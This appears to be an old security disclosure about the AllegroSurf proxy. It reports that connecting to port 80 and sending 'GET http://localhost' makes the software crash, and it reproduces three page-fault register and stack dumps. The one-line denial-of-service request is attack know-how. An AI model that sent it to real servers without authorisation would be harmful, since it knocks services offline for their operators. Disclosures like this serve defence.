[http://www.allegrosurf.com]

Connect to port 80 and type 'GET http://localhost'. Results are three
consecutive crashes...

ALLEGROSURF caused an invalid page fault in
module <unknown> at 0084:00000009.
Registers:
EAX=00000000 CS=015f EIP=00000009 EFLGS=00010202
EBX=bff54733 SS=0167 ESP=00630638 EBP=00772ac0
ECX=2c2b7700 DS=0167 ESI=bff55801 FS=122f
EDX=0001b45f ES=0167 EDI=bff5575d GS=0000
Bytes at CS:EIP:
00 8a 07 65 04 70 00 65 04 70 00 54 ff 00 f0 08 
Stack dump:
00000167 1001de49 0000000a 00772ac0 00766070
00000008 00510a78 00000180 00000eac 00000113
00000001 00000000 03ba11db 0000029b 000001df
10017fc6

ALLEGROSURF caused an invalid page fault in
module ALLEGROSURF.DLL at 015f:1001dfee.
Registers:
EAX=0063fbe8 CS=015f EIP=1001dfee EFLGS=00010206
EBX=00767ab0 SS=0167 ESP=0063fbd4 EBP=00000000
ECX=0063fbf0 DS=0167 ESI=77542400 FS=122f
EDX=bffc9490 ES=0167 EDI=007660c8 GS=0000
Bytes at CS:EIP:
8b 46 2c 8b 7e 30 8b 1d c0 c7 05 10 8d 4c 24 14 
Stack dump:
007660c8 00766070 0063fc50 00767ab0 00000000
5f4a3c6c 00000048 0063fc0c 10056e48 ffffffff
100179e4 00000000 00766070 00766070 0063fe28
100561c4

ALLEGROSURF caused an invalid page fault in
module MFC42.DLL at 015f:5f402b52.
Registers:
EAX=8163fe34 CS=015f EIP=5f402b52 EFLGS=00010206
EBX=0063fc0c SS=0167 ESP=0063f720 EBP=0063f748
ECX=77687000 DS=0167 ESI=77687000 FS=122f
EDX=00013f70 ES=0167 EDI=00000000 GS=0000
Bytes at CS:EIP:
8b 31 51 e8 27 0d 00 00 59 85 f6 8b ce 75 f1 5e 
Stack dump:
007660c8 5f403e26 10063028 007660c8 5f4130ab
00000003 007660c8 0063f794 5f49292c 00000000
0063fc18 7800c9b8 10063028 00000003 0063f768
0063f9b8

Later Packet Monkies...
Wizdumb [MDMA]